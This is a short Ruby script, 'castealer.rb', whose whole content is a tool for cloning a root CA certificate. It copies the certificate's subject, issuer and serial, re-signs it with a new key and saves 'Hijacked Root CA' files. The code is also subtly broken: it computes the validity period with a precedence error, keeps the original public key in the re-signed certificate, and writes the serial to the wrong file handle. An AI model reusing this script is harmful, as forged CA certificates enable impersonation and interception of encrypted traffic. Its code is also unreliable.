castealer.rb

require 'rubygems'
require 'openssl'
puts "Warning this tool only works with DER encoded certificates"
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) 
ctx = OpenSSL::SSL::SSLContext.new
public_key = key.public_key
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.not_before = Time.now
cert.not_after = Time.now + 365+365+365+365 * 24 * 60 * 60
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new
ef.issuer_certificate = OpenSSL::X509::Certificate.new raw
cert.subject = ef.issuer_certificate.subject
ef.subject_certificate = ef.issuer_certificate
cert.issuer = ef.issuer_certificate.subject
cert.serial = ef.issuer_certificate.serial
ctx.key = ef.issuer_certificate.public_key
cert.public_key = ef.issuer_certificate.public_key
ctx.cert = ef.issuer_certificate
cert.add_extension(ef.create_extension("basicConstraints","CA:true",true))
cert.add_extension(ef.create_extension("keyUsage","keyCertSign, cRLSign", true))
cert.add_extension(ef.create_extension("subjectKeyIdentifier","hash", false))
cert.add_extension(ef.create_extension("authorityKeyIdentifier","keyid:always",false))
puts "Signing Certificate"
skey = cert.sign(key, OpenSSL::Digest::SHA256.new)
root = ef.issuer_certificate.sign(key, OpenSSL::Digest::SHA256.new)
filer = File.open("#{cert.serial}"".pub"".key", "w")
filer.syswrite("#{key.to_pem}")
file = File.open("#{cert.serial}"".pub"".pem", "w")
file.syswrite("#{skey.to_pem}")
files = File.open("#{cert.serial}"".crt", "w")
files.syswrite("#{root.to_pem}")
files = File.open("#{cert.serial}"".pem", "w")
files.syswrite("#{cert.to_pem}")
filed = File.open("#{cert.serial}"".srl", "w")
file.syswrite("#{cert.serial}")
puts "Hijacked Root CA saved #{cert.serial}.crt"
puts "Hijacked Secondary CA saved #{cert.serial}.pem"
puts "Hijacked Root CA key saved #{cert.serial}.key"
printf "Verifying Keys: "
puts  root.verify(key)